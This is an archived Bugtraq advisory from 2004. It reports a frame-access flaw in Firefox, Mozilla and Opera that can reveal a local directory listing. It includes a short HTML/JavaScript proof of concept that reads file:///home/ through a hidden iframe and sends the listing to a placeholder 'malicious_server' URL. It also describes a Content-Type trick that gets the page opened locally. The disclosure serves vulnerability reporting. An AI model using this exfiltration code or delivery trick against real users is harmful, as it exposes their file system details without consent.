Bugtraqmailing list archives
Disclosure of file system information in Mozilla Firefox and Opera Browser:
From: "Giovanni Delvecchio" <badpenguin79 () hotmail com>
Date: Wed, 01 Dec 2004 16:15:25 +0000
Title: Disclosure of file system information in Mozilla Firefox and OperaBrowser
Note:I don't know if it could be considered really a security problem, anywayi'll try to explain my ideas.
Sorry for my bad english.Author: Giovanni DelvecchioBug: Disclosure of file system informationApplications affected:- Firefox 1.0- Mozilla 1.7- Opera 7.54 (*)( maybe also previous versions )Tested versions:- Firefox 1.0 on Linux and Windows- Mozilla 1.7 on Windows- Opera 7.51,..7.54 on LinuxNote:The content of this advisory could be applied also to other browsers, i havechecked just Mozilla, Firefox,Opera and Microsoft Internet Explorer.
Microsoft Internet Explorer seems not to be affected.Bug Description:================A problem exist in some browsers where a frame can gain access to attributesof another frame or iframe.An application of this bug could be the possibility to disclose localdirectory structure.
PoC:===------ begin code.htm -----<html><body onLoad=" list_files=''; for(i=0;i<local_files.document.links.length;i++) {list_files+=local_files.document.links.item(i);} alert(list_files); //send list_files at malicious_serverdocument.location.href='http://malicious_server/grab.php?list='+list_files;"><iframe name="local_files" src="file:///home/" height=0width=0></iframe></body></html>------ end of code.htm -------Impact:======A malicious server could obtain the content of /home/ directory ( orc:\Document and Setting\ for windows system ) and so know a set ofusernames present on system target.Moreover, colud be possible know if a particolar program is installed ontarget system for a succesive attack.Anyway it cannot be exploited "directly" by a remote site, but only if thepage is opened from a local path ( file://localpath/code.htm), since theiframe "local_files" belongs to a local domain.
Note: with Internet Explorer code.htm doesn't work even in local.Possible Remote Exploitation:========================Question:How could a malicious remote user exploit it ?Answer:After that the user "victim" has requiredhttp://maliciuos_server/code.htm,if malicious_server responds with a page containing an unknown Content-Typefield ( for example text/html. ,note the dot) ,the browser will show adialog window with some options (open, save, cancel). Choosing "Open" toview this page, it will be downloaded and opened in local ; javascript codewill be executed in local context.
Obviously, if user chooses to save and after open it the result is equal.(*) For Opera this method of remote exploitation requires that opera mustbe setted as Default Application in "handler for saved files" whether theuser choose "Open" in the dialog window.
Solution:========No solution at the momentVendor notice==============24th November 2004: I have contacted mozilla by security () mozilla organd Opera by its bug track page athttps://bugs.opera.com/wizard/No response from both at the moment.Best regards,Giovanni Delvecchio_________________________________________________________________Personalizza MSN Messenger con sfondi e fotografie!http://www.ilovemessenger.msn.it/
Current thread:
- Disclosure of file system information in Mozilla Firefox and Opera Browser:Giovanni Delvecchio (Dec 01)
- <Possible follow-ups>
- RE: Disclosure of file system information in Mozilla Firefox and Opera Browser:Thor Larholm (Dec 07)